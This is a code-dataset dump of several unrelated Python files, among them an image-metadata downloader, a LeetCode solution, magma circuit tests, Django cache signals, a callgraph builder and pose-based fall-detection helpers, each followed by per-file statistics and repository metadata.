prop = lambda v: (v / float(total))
histogram = {k: prop(v) for k, v in histogram.iteritems()}
items = histogram.items()
items_sorted = sorted(
items,
key=lambda t: t[1],
reverse=(not ascending)
)
ordered = OrderedDict(items_sorted)
return ordered
def download_metadata(self, n_threads=5):
web_request_queue = Queue()
json_serialization_queue = Queue()
urls = self.paginated_media_urls
if len(urls) > 1:
for url in urls:
web_request_queue.put(url)
web_thread = lambda: ThreadMetadataRequest(
web_request_queue,
json_serialization_queue,
self.session
)
pool_size = min(len(urls), n_threads)
web_pool = [web_thread() for x in range(pool_size)]
json_serializer = ThreadJSONWriter(
json_serialization_queue,
self.metadata_filepath
)
for thread in web_pool:
thread.setDaemon(True)
thread.start()
json_serializer.start()
web_request_queue.join()
json_serialization_queue.join()
else:
json_response = self._grab_json(urls[0])
media_entries = json_response['media']
media_dict = list_of_dicts_to_dict(
media_entries, promote_to_key='_id')
exists = osp.isfile(self.metadata_filepath)
filemode = 'r+w' if exists else 'w'
with open(self.metadata_filepath, filemode) as f:
try:
cached_meta = load_json(f) if exists else {}
except ValueError:
cached_meta = {}
cached_meta.update(media_dict)
dump_json(cached_meta, f)
self._metadata = cached_meta
def deserialize_metadata(self, return_iterator=False):
if self._metadata_exists():
with open(self.metadata_filepath, 'r') as f:
metadata = load_json(f)
return metadata
def cache_all_image_data(self):
image_queue = Queue()
for image in self._generate_images():
image_queue.put(image)
thread_pool = []
for i in range(8):
thread = ThreadCacheImageData(image_queue)
thread.start()
thread_pool.append(thread)
image_queue.join()
if '__main__' in __name__:
parser = argparse.ArgumentParser(prog='PROG')
parser.add_argument('--subdomain',
help='''Can be either the subdomain
or full url of anything with the subdomain in it''',
default='slowed'
)
parser.add_argument('--hist',
help='''Specify an Image Parameter to bin the
frequencies of the different values''',
default='preset'
)
parser.add_argument('--auto-cache',
help='''Automatically download and cache all images
in grid''',
type=bool,
default='False'
)
args = parser.parse_args()
grid = Grid(subdomain=args.subdomain)
grid.download_metadata()
grid.cache_all_image_data()
| 32.047847 | 83 | 0.578531 | 1,563 | 13,396 | 4.691619 | 0.202175 | 0.024547 | 0.019637 | 0.01091 | 0.142643 | 0.098459 | 0.073094 | 0.051821 | 0.021274 | 0 | 0 | 0.007026 | 0.320021 | 13,396 | 417 | 84 | 32.1247 | 0.798002 | 0 | 0 | 0.098214 | 0 | 0 | 0.099433 | 0.003509 | 0 | 0 | 0 | 0 | 0 | 1 | 0.089286 | false | 0 | 0.050595 | 0.014881 | 0.22619 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d14698eb579db72a4bb8620672365630c114783b | 1,409 | py | Python | LeetCodeSolutions/LeetCode_0273.py | lih627/python-algorithm-templates | a61fd583e33a769b44ab758990625d3381793768 | [
"MIT"
] | 24 | 2020-03-28T06:10:25.000Z | 2021-11-23T05:01:29.000Z | LeetCodeSolutions/LeetCode_0273.py | lih627/python-algorithm-templates | a61fd583e33a769b44ab758990625d3381793768 | [
"MIT"
] | null | null | null | LeetCodeSolutions/LeetCode_0273.py | lih627/python-algorithm-templates | a61fd583e33a769b44ab758990625d3381793768 | [
"MIT"
] | 8 | 2020-05-18T02:43:16.000Z | 2021-05-24T18:11:38.000Z | class Solution:
def numberToWords(self, num: int) -> str:
if not num:
return 'Zero'
to9 = ['One', 'Two', 'Three', 'Four', 'Five', 'Six', 'Seven', 'Eight', 'Nine']
to19 = ['Ten', 'Eleven', 'Twelve', 'Thirteen', 'Fourteen', 'Fifteen', 'Sixteen', 'Seventeen', 'Eighteen',
'Nineteen']
to99 = ['Twenty', 'Thirty', 'Forty', 'Fifty', 'Sixty', 'Seventy', 'Eighty', 'Ninety']
res = []
def trans(n):
ans = []
if n // 100:
ans.append(to9[n // 100 - 1])
ans.append('Hundred')
if 9 < n % 100 < 20:
ans.append(to19[n % 100 - 10])
return ans
if n % 100 >= 20:
ans.append(to99[n % 100 // 10 - 2])
if n % 10:
ans.append(to9[n % 10 - 1])
return ans
billion = num // 10 ** 9
tmp = trans(billion)
if tmp:
res += tmp + ['Billion']
million = num % 10 ** 9 // 10 ** 6
tmp = trans(million)
if tmp:
res += tmp + ['Million']
thousand = num % 10 ** 9 % 10 ** 6 // 10 ** 3
tmp = trans(thousand)
if tmp:
res += tmp + ['Thousand']
hundred = num % 10 ** 9 % 10 ** 6 % 10 ** 3
tmp = trans(hundred)
if tmp:
res += tmp
return ' '.join(res)
| 32.767442 | 113 | 0.411639 | 155 | 1,409 | 3.741935 | 0.393548 | 0.041379 | 0.041379 | 0.075862 | 0.136207 | 0.068966 | 0.068966 | 0.068966 | 0.068966 | 0 | 0 | 0.088452 | 0.422285 | 1,409 | 42 | 114 | 33.547619 | 0.624079 | 0 | 0 | 0.153846 | 0 | 0 | 0.132009 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051282 | false | 0 | 0 | 0 | 0.179487 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d146dce5cb180008a9518379b52a99316b5f1628 | 615 | py | Python | tests/test_circuit/test_declare.py | Kuree/magma | be2439aa897768c5810be72e3a55a6f772ac83cf | [
"MIT"
] | null | null | null | tests/test_circuit/test_declare.py | Kuree/magma | be2439aa897768c5810be72e3a55a6f772ac83cf | [
"MIT"
] | null | null | null | tests/test_circuit/test_declare.py | Kuree/magma | be2439aa897768c5810be72e3a55a6f772ac83cf | [
"MIT"
] | null | null | null |
import magma as m
def test_declare_simple():
And2 = m.DeclareCircuit("And2", "I0", m.In(m.Bit), "I1", m.In(m.Bit), "O",
m.Out(m.Bit))
assert isinstance(And2.I0, m.BitType)
def test_declare_interface_polarity():
And2Decl = m.DeclareCircuit("And2", "I0", m.In(m.Bit), "I1", m.In(m.Bit),
"O", m.Out(m.Bit))
And2Defn = m.DefineCircuit("And2", "I0", m.In(m.Bit), "I1", m.In(m.Bit),
"O", m.Out(m.Bit))
assert And2Decl.interface.ports["I0"].isinput() == \
And2Defn.interface.ports["I0"].isinput()
| 32.368421 | 78 | 0.528455 | 87 | 615 | 3.678161 | 0.298851 | 0.1125 | 0.075 | 0.13125 | 0.421875 | 0.421875 | 0.421875 | 0.421875 | 0.421875 | 0.421875 | 0 | 0.040268 | 0.273171 | 615 | 18 | 79 | 34.166667 | 0.675615 | 0 | 0 | 0.166667 | 0 | 0 | 0.050489 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0.166667 | false | 0 | 0.083333 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d14a1f755d55d9ceb38f5e95241f78d970b5dd71 | 1,289 | py | Python | termsandconditions/signals.py | ondergetekende/django-termsandconditions | 5852f5c0075ad9b1819c1dbad9a5810e19da881d | [
"BSD-3-Clause"
] | 102 | 2015-04-27T18:54:57.000Z | 2022-03-21T00:18:40.000Z | termsandconditions/signals.py | ondergetekende/django-termsandconditions | 5852f5c0075ad9b1819c1dbad9a5810e19da881d | [
"BSD-3-Clause"
] | 203 | 2015-08-05T19:00:52.000Z | 2022-02-11T13:13:21.000Z | termsandconditions/signals.py | mcrot/django-termsandconditions | d93e7bcc5c3f3fc28ac58025a987e31ef3ad3901 | [
"BSD-3-Clause"
] | 53 | 2015-01-19T14:28:52.000Z | 2022-03-01T09:30:08.000Z | """ Signals for Django """
# pylint: disable=C1001,E0202,W0613
import logging
from django.core.cache import cache
from django.dispatch import receiver
from .models import TermsAndConditions, UserTermsAndConditions
from django.db.models.signals import post_delete, post_save
LOGGER = logging.getLogger(name="termsandconditions")
@receiver([post_delete, post_save], sender=UserTermsAndConditions)
def user_terms_updated(sender, **kwargs):
"""Called when user terms and conditions is changed - to force cache clearing"""
LOGGER.debug("User T&C Updated Signal Handler")
if kwargs.get("instance").user:
cache.delete(
"tandc.not_agreed_terms_" + kwargs.get("instance").user.get_username()
)
@receiver([post_delete, post_save], sender=TermsAndConditions)
def terms_updated(sender, **kwargs):
"""Called when terms and conditions is changed - to force cache clearing"""
LOGGER.debug("T&C Updated Signal Handler")
cache.delete("tandc.active_terms_ids")
cache.delete("tandc.active_terms_list")
if kwargs.get("instance").slug:
cache.delete("tandc.active_terms_" + kwargs.get("instance").slug)
for utandc in UserTermsAndConditions.objects.all():
cache.delete("tandc.not_agreed_terms_" + utandc.user.get_username())
| 37.911765 | 84 | 0.738557 | 163 | 1,289 | 5.699387 | 0.368098 | 0.059203 | 0.086114 | 0.058127 | 0.466093 | 0.331539 | 0.124865 | 0.124865 | 0.124865 | 0.124865 | 0 | 0.01087 | 0.143522 | 1,289 | 33 | 85 | 39.060606 | 0.830616 | 0.154383 | 0 | 0 | 0 | 0 | 0.202237 | 0.084809 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.227273 | 0 | 0.318182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d14e0cc6fabd6fe07e41014cc1ba52fe4ee70327 | 1,213 | py | Python | gene_finding/pathway_matrix.py | ddhostallero/cxplain | c17a119faa384ffd2ca01529d470df2bd4b16813 | [
"MIT"
] | null | null | null | gene_finding/pathway_matrix.py | ddhostallero/cxplain | c17a119faa384ffd2ca01529d470df2bd4b16813 | [
"MIT"
] | null | null | null | gene_finding/pathway_matrix.py | ddhostallero/cxplain | c17a119faa384ffd2ca01529d470df2bd4b16813 | [
"MIT"
] | null | null | null | import pandas as pd
def get_valid_enrichr_pathways(pathway_nodemap):
node_map = pd.read_csv(pathway_nodemap, sep='\t', header=None)
pathways = node_map.loc[node_map[2]=='Property']
pathways = pathways.loc[pathways[4].str.contains('Homo sapiens')]
pathways = list(pathways[0].unique())
print("Number of Homo sapiens pathways: %d"%(len(pathways)))
return pathways
def load_pathway(pathway_file, genes, list_of_pathways=None, threshold=0, sort=False):
pathway = pd.read_csv(pathway_file, sep='\t', header=None)
n_clusters = len(pathway[0].unique())
df = pd.DataFrame(index=genes)
genes = pd.Series(genes)
size = pathway.groupby(0).size()
if list_of_pathways is not None:
pathway = pathway.loc[pathway[0].isin(list_of_pathways)]
pathway_names = []
for i, clust in enumerate(list_of_pathways):
if size[clust] < threshold:
continue
genes_in_clust = pathway.loc[pathway[0] == clust][1]
df[i] = list(genes.isin(genes_in_clust)*1)
pathway_names.append(clust)
if sort:
df.columns = pathway_names
cols = df.sum(axis=0).sort_values().index
df = df[cols]
pathway_names = list(cols)
print("Number of valid pathways: %d"%(len(pathway_names)))
return df.T.values, pathway_names
| 28.209302 | 86 | 0.727947 | 188 | 1,213 | 4.521277 | 0.361702 | 0.084706 | 0.065882 | 0.037647 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010397 | 0.127782 | 1,213 | 42 | 87 | 28.880952 | 0.793006 | 0 | 0 | 0 | 0 | 0 | 0.071723 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.033333 | 0 | 0.166667 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d14ea0e1dd10902be328d136103d6211cebc24d9 | 4,543 | py | Python | chb/graphics/DotCallgraph.py | psifertex/CodeHawk-Binary | 1711d7b16d32a2e9ffa9d22af483182b3f9ded77 | [
"MIT"
] | null | null | null | chb/graphics/DotCallgraph.py | psifertex/CodeHawk-Binary | 1711d7b16d32a2e9ffa9d22af483182b3f9ded77 | [
"MIT"
] | null | null | null | chb/graphics/DotCallgraph.py | psifertex/CodeHawk-Binary | 1711d7b16d32a2e9ffa9d22af483182b3f9ded77 | [
"MIT"
] | null | null | null | # ------------------------------------------------------------------------------
# Python API to access CodeHawk Binary Analyzer analysis results
# Author: Henny Sipma
# ------------------------------------------------------------------------------
# The MIT License (MIT)
#
# Copyright (c) 2016-2020 Kestrel Technology LLC
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ------------------------------------------------------------------------------
import chb.util.graphutil as UG
from chb.util.DotGraph import DotGraph
class DotCallgraph(object):
def __init__(self,graphname,callgraph,sinks=[],startaddr=None,getname=lambda x:x):
self.graphname = graphname
self.callgraph = callgraph # address -> address/name -> count
self.dotgraph = DotGraph(graphname)
self.dotgraph.rankdir = 'LR'
self.sinks = sinks
self.startaddr = startaddr
self.pathnodes = set([])
self.getname = getname
if self.startaddr and not self.sinks:
self.restrict_nodes_from(self.startaddr)
else:
self.restrict_nodes()
def build(self,coloring=lambda n:'purple'): # name -> color / None
if len(self.sinks) > 0:
self.restrict_nodes()
for n in self.callgraph:
if coloring(n) is None: continue
self.add_cg_node(n,coloring(n))
for d in self.callgraph[n]:
self.add_cg_edge(n,d,self.callgraph[n][d],coloring)
return self.dotgraph
def restrict_nodes(self):
nodes = set([])
edges = {}
for n in self.callgraph:
nodes.add(n)
for d in self.callgraph[n]:
nodes.add(d)
edges.setdefault(n,[])
edges[n].append(d)
if self.startaddr is None:
self.pathnodes = nodes
return
g = UG.DirectedGraph(nodes,edges)
if len(self.sinks) > 0:
g.find_paths(self.startaddr,self.sinks[0])
for p in g.paths:
print('Path: ' + str(p))
self.pathnodes = self.pathnodes.union(p)
if len(self.pathnodes) == 0:
self.pathnodes = nodes
else:
self.pathnodes = nodes
def restrict_nodes_from(self,startaddr):
nodes = set([])
edges = {}
nodes.add(startaddr)
for d in self.callgraph[startaddr]:
nodes.add(d)
edges.setdefault(startaddr,[])
edges[startaddr].append(d)
nodecount = len(nodes)
while True:
for n in self.callgraph:
if n in nodes:
for d in self.callgraph[n]:
nodes.add(d)
edges.setdefault(n,[])
edges[n].append(d)
if len(nodes) == nodecount:
break
nodecount = len(nodes)
self.pathnodes = nodes
def add_cg_node(self,n,color):
blocktxt = self.getname(str(n))
if str(n) in self.pathnodes:
self.dotgraph.add_node(str(n),labeltxt=blocktxt,color=color)
def add_cg_edge(self,n,d,count,coloring=lambda n:'purple'):
labeltxt = str(count)
if coloring(d) is None:
return
if str(n) in self.pathnodes and str(d) in self.pathnodes:
blocktxt = self.getname(str(d))
self.dotgraph.add_node(str(d),labeltxt=blocktxt,color=coloring(d))
self.dotgraph.add_edge(str(n),str(d))
| 39.163793 | 86 | 0.577812 | 555 | 4,543 | 4.688288 | 0.311712 | 0.054958 | 0.040354 | 0.015373 | 0.162183 | 0.086856 | 0.054573 | 0.046118 | 0.046118 | 0.046118 | 0 | 0.00368 | 0.282192 | 4,543 | 115 | 87 | 39.504348 | 0.794235 | 0.322254 | 0 | 0.392405 | 0 | 0 | 0.006557 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075949 | false | 0 | 0.025316 | 0 | 0.151899 | 0.012658 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d14f5de29c43f3d58567f24eb469f0031c177a7d | 11,644 | py | Python | vis/inv_pendulum.py | Inc0mple/smarteye_app | a1d62adffc15967c3b31027f915ba8e41313d97f | [
"MIT"
] | null | null | null | vis/inv_pendulum.py | Inc0mple/smarteye_app | a1d62adffc15967c3b31027f915ba8e41313d97f | [
"MIT"
] | null | null | null | vis/inv_pendulum.py | Inc0mple/smarteye_app | a1d62adffc15967c3b31027f915ba8e41313d97f | [
"MIT"
] | null | null | null | from .visual import CocoPart
import numpy as np
from helpers import *
from default_params import *
def match_ip(ip_set, new_ips, lstm_set, num_matched, consecutive_frames=DEFAULT_CONSEC_FRAMES):
len_ip_set = len(ip_set)
added = [False for _ in range(len_ip_set)]
new_len_ip_set = len_ip_set
for new_ip in new_ips:
if not is_valid(new_ip):
continue
# assert valid_candidate_hist(new_ip)
cmin = [MIN_THRESH, -1]
for i in range(len_ip_set):
if not added[i] and dist(last_ip(ip_set[i])[0], new_ip) < cmin[0]:
# here add dome condition that last_ip(ip_set[0] >-5 or someting)
cmin[0] = dist(last_ip(ip_set[i])[0], new_ip)
cmin[1] = i
if cmin[1] == -1:
ip_set.append([None for _ in range(consecutive_frames - 1)] + [new_ip])
lstm_set.append([None, 0, 0, 0]) # Initial hidden state of lstm is None
new_len_ip_set += 1
else:
added[cmin[1]] = True
pop_and_add(ip_set[cmin[1]], new_ip, consecutive_frames)
new_matched = num_matched
removed_indx = []
removed_match = []
for i in range(len(added)):
if not added[i]:
pop_and_add(ip_set[i], None, consecutive_frames)
if ip_set[i] == [None for _ in range(consecutive_frames)]:
if i < num_matched:
new_matched -= 1
removed_match.append(i)
new_len_ip_set -= 1
removed_indx.append(i)
for i in sorted(removed_indx, reverse=True):
ip_set.pop(i)
lstm_set.pop()
return new_matched, new_len_ip_set, removed_match
def extend_vector(p1, p2, l):
p1 += (p1-p2)*l/(2*np.linalg.norm((p1-p2), 2))
p2 -= (p1-p2)*l/(2*np.linalg.norm((p1-p2), 2))
return p1, p2
def perp(a):
b = np.empty_like(a)
b[0] = -a[1]
b[1] = a[0]
return b
# line segment a given by endpoints a1, a2
# line segment b given by endpoints b1, b2
# return
def seg_intersect(a1, a2, b1, b2):
da = a2-a1
db = b2-b1
dp = a1-b1
dap = perp(da)
denom = np.dot(dap, db)
num = np.dot(dap, dp)
return (num / denom.astype(float))*db + b1
def get_kp(kp):
threshold1 = 5e-3
# dict of np arrays of coordinates
inv_pend = {}
# print(type(kp[CocoPart.LEar]))
numx = (kp[CocoPart.LEar][2]*kp[CocoPart.LEar][0] + kp[CocoPart.LEye][2]*kp[CocoPart.LEye][0] +
kp[CocoPart.REye][2]*kp[CocoPart.REye][0] + kp[CocoPart.REar][2]*kp[CocoPart.REar][0])
numy = (kp[CocoPart.LEar][2]*kp[CocoPart.LEar][1] + kp[CocoPart.LEye][2]*kp[CocoPart.LEye][1] +
kp[CocoPart.REye][2]*kp[CocoPart.REye][1] + kp[CocoPart.REar][2]*kp[CocoPart.REar][1])
den = kp[CocoPart.LEar][2] + kp[CocoPart.LEye][2] + kp[CocoPart.REye][2] + kp[CocoPart.REar][2]
if den < HEAD_THRESHOLD:
inv_pend['H'] = None
else:
inv_pend['H'] = np.array([numx/den, numy/den])
if all([kp[CocoPart.LShoulder], kp[CocoPart.RShoulder],
kp[CocoPart.LShoulder][2] > threshold1, kp[CocoPart.RShoulder][2] > threshold1]):
inv_pend['N'] = np.array([(kp[CocoPart.LShoulder][0]+kp[CocoPart.RShoulder][0])/2,
(kp[CocoPart.LShoulder][1]+kp[CocoPart.RShoulder][1])/2])
else:
inv_pend['N'] = None
if all([kp[CocoPart.LHip], kp[CocoPart.RHip],
kp[CocoPart.LHip][2] > threshold1, kp[CocoPart.RHip][2] > threshold1]):
inv_pend['B'] = np.array([(kp[CocoPart.LHip][0]+kp[CocoPart.RHip][0])/2,
(kp[CocoPart.LHip][1]+kp[CocoPart.RHip][1])/2])
else:
inv_pend['B'] = None
if kp[CocoPart.LKnee] is not None and kp[CocoPart.LKnee][2] > threshold1:
inv_pend['KL'] = np.array([kp[CocoPart.LKnee][0], kp[CocoPart.LKnee][1]])
else:
inv_pend['KL'] = None
if kp[CocoPart.RKnee] is not None and kp[CocoPart.RKnee][2] > threshold1:
inv_pend['KR'] = np.array([kp[CocoPart.RKnee][0], kp[CocoPart.RKnee][1]])
else:
inv_pend['KR'] = None
if inv_pend['B'] is not None:
if inv_pend['N'] is not None:
height = np.linalg.norm(inv_pend['N'] - inv_pend['B'], 2)
LS, RS = extend_vector(np.asarray(kp[CocoPart.LShoulder][:2]),
np.asarray(kp[CocoPart.RShoulder][:2]), height/4)
LB, RB = extend_vector(np.asarray(kp[CocoPart.LHip][:2]),
np.asarray(kp[CocoPart.RHip][:2]), height/3)
ubbox = (LS, RS, RB, LB)
if inv_pend['KL'] is not None and inv_pend['KR'] is not None:
lbbox = (LB, RB, inv_pend['KR'], inv_pend['KL'])
else:
lbbox = ([0, 0], [0, 0])
#lbbox = None
else:
ubbox = ([0, 0], [0, 0])
#ubbox = None
if inv_pend['KL'] is not None and inv_pend['KR'] is not None:
lbbox = (np.array(kp[CocoPart.LHip][:2]), np.array(kp[CocoPart.RHip][:2]),
inv_pend['KR'], inv_pend['KL'])
else:
lbbox = ([0, 0], [0, 0])
#lbbox = None
else:
ubbox = ([0, 0], [0, 0])
lbbox = ([0, 0], [0, 0])
#ubbox = None
#lbbox = None
# condition = (inv_pend["H"] is None) and (inv_pend['N'] is not None and inv_pend['B'] is not None)
# if condition:
# print("half disp")
return inv_pend, ubbox, lbbox
def get_angle(v0, v1):
return np.math.atan2(np.linalg.det([v0, v1]), np.dot(v0, v1))
def is_valid(ip):
assert ip is not None
ip = ip["keypoints"]
return (ip['B'] is not None and ip['N'] is not None and ip['H'] is not None)
def get_rot_energy(ip0, ip1):
t = ip1["time"] - ip0["time"]
ip0 = ip0["keypoints"]
ip1 = ip1["keypoints"]
m1 = 1
m2 = 5
m3 = 5
energy = 0
den = 0
N1 = ip1['N'] - ip1['B']
N0 = ip0['N'] - ip0['B']
d2sq = N1.dot(N1)
w2sq = (get_angle(N0, N1)/t)**2
energy += m2*d2sq*w2sq
den += m2*d2sq
H1 = ip1['H'] - ip1['B']
H0 = ip0['H'] - ip0['B']
d1sq = H1.dot(H1)
w1sq = (get_angle(H0, H1)/t)**2
energy += m1*d1sq*w1sq
den += m1*d1sq
energy = energy/(2*den)
# energy = energy/2
return energy
def get_angle_vertical(v):
return np.math.atan2(-v[0], -v[1])
def get_gf(ip0, ip1, ip2):
t1 = ip1["time"] - ip0["time"]
t2 = ip2["time"] - ip1["time"]
ip0 = ip0["keypoints"]
ip1 = ip1["keypoints"]
ip2 = ip2["keypoints"]
m1 = 1
m2 = 15
g = 10
H2 = ip2['H'] - ip2['N']
H1 = ip1['H'] - ip1['N']
H0 = ip0['H'] - ip0['N']
d1 = np.sqrt(H1.dot(H1))
theta_1_plus_2_2 = get_angle_vertical(H2)
theta_1_plus_2_1 = get_angle_vertical(H1)
theta_1_plus_2_0 = get_angle_vertical(H0)
# print("H: ",H0,H1,H2)
N2 = ip2['N'] - ip2['B']
N1 = ip1['N'] - ip1['B']
N0 = ip0['N'] - ip0['B']
d2 = np.sqrt(N1.dot(N1))
# print("N: ",N0,N1,N2)
theta_2_2 = get_angle_vertical(N2)
theta_2_1 = get_angle_vertical(N1)
theta_2_0 = get_angle_vertical(N0)
#print("theta_2_2:",theta_2_2,"theta_2_1:",theta_2_1,"theta_2_0:",theta_2_0,sep=", ")
theta_1_0 = theta_1_plus_2_0 - theta_2_0
theta_1_1 = theta_1_plus_2_1 - theta_2_1
theta_1_2 = theta_1_plus_2_2 - theta_2_2
# print("theta1: ",theta_1_0,theta_1_1,theta_1_2)
# print("theta2: ",theta_2_0,theta_2_1,theta_2_2)
theta2 = theta_2_1
theta1 = theta_1_1
del_theta1_0 = (get_angle(H0, H1))/t1
del_theta1_1 = (get_angle(H1, H2))/t2
del_theta2_0 = (get_angle(N0, N1))/t1
del_theta2_1 = (get_angle(N1, N2))/t2
# print("del_theta2_1:",del_theta2_1,"del_theta2_0:",del_theta2_0,sep=",")
del_theta1 = 0.5 * (del_theta1_1 + del_theta1_0)
del_theta2 = 0.5 * (del_theta2_1 + del_theta2_0)
doubledel_theta1 = (del_theta1_1 - del_theta1_0) / 0.5*(t1 + t2)
doubledel_theta2 = (del_theta2_1 - del_theta2_0) / 0.5*(t1 + t2)
# print("doubledel_theta2:",doubledel_theta2)
d1 = d1/d2
d2 = 1
# print("del_theta",del_theta1,del_theta2)
# print("doubledel_theta",doubledel_theta1,doubledel_theta2)
Q_RD1 = 0
Q_RD1 += m1 * d1 * doubledel_theta1 * doubledel_theta1
Q_RD1 += (m1*d1*d1 + m1*d1*d2*np.cos(theta1))*doubledel_theta2
Q_RD1 += m1*d1*d2*np.sin(theta1)*del_theta2*del_theta2
Q_RD1 -= m1*g*d2*np.sin(theta1+theta2)
Q_RD2 = 0
Q_RD2 += (m1*d1*d1 + m1*d1*d2*np.cos(theta1))*doubledel_theta1
Q_RD2 += ((m1+m2)*d2*d2 + m1*d1*d1 + 2*m1*d1*d2*np.cos(theta1))*doubledel_theta2
Q_RD2 -= 2*m1*d1*d2*np.sin(theta1)*del_theta2*del_theta1 + m1*d1 * \
d2*np.sin(theta1)*del_theta1*del_theta1
Q_RD2 -= (m1 + m2)*g*d2*np.sin(theta2) + m1*g*d1*np.sin(theta1 + theta2)
# print("Energy: ", Q_RD1 + Q_RD2)
return Q_RD1 + Q_RD2
def get_height_bbox(ip):
bbox = ip["box"]
assert(type(bbox == np.ndarray))
diff_box = bbox[1] - bbox[0]
return diff_box[1]
def get_ratio_bbox(ip):
bbox = ip["box"]
assert(type(bbox == np.ndarray))
diff_box = bbox[1] - bbox[0]
if diff_box[1] == 0:
diff_box[1] += 1e5*diff_box[0]
assert(np.any(diff_box > 0))
ratio = diff_box[0]/diff_box[1]
return ratio
def get_ratio_derivative(ip0, ip1):
ratio_der = None
time = ip1["time"] - ip0["time"]
diff_box = ip1["features"]["ratio_bbox"] - ip0["features"]["ratio_bbox"]
assert time != 0
ratio_der = diff_box/time
return ratio_der
def match_ip2(matched_ip_set, unmatched_ip_set, new_ips, re_matrix, gf_matrix, consecutive_frames=DEFAULT_CONSEC_FRAMES):
len_matched_ip_set = len(matched_ip_set)
added_matched = [False for _ in range(len_matched_ip_set)]
len_unmatched_ip_set = len(unmatched_ip_set)
added_unmatched = [False for _ in range(len_unmatched_ip_set)]
for new_ip in new_ips:
if not is_valid(new_ip):
continue
cmin = [MIN_THRESH, -1]
connected_set = None
connected_added = None
for i in range(len_matched_ip_set):
if not added_matched[i] and dist(last_ip(matched_ip_set[i])[0], new_ip) < cmin[0]:
# here add dome condition that last_ip(ip_set[0] >-5 or someting)
cmin[0] = dist(last_ip(matched_ip_set[i])[0], new_ip)
cmin[1] = i
connected_set = matched_ip_set
connected_added = added_matched
for i in range(len_unmatched_ip_set):
if not added_unmatched[i] and dist(last_ip(unmatched_ip_set[i])[0], new_ip) < cmin[0]:
# here add dome condition that last_ip(ip_set[0] >-5 or someting)
cmin[0] = dist(last_ip(unmatched_ip_set[i])[0], new_ip)
cmin[1] = i
connected_set = unmatched_ip_set
connected_added = added_unmatched
if cmin[1] == -1:
unmatched_ip_set.append([None for _ in range(consecutive_frames - 1)] + [new_ip])
# re_matrix.append([])
# gf_matrix.append([])
else:
connected_added[cmin[1]] = True
pop_and_add(connected_set[cmin[1]], new_ip, consecutive_frames)
i = 0
while i < len(added_matched):
if not added_matched[i]:
pop_and_add(matched_ip_set[i], None, consecutive_frames)
if matched_ip_set[i] == [None for _ in range(consecutive_frames)]:
matched_ip_set.pop(i)
# re_matrix.pop(i)
# gf_matrix.pop(i)
added_matched.pop(i)
continue
i += 1
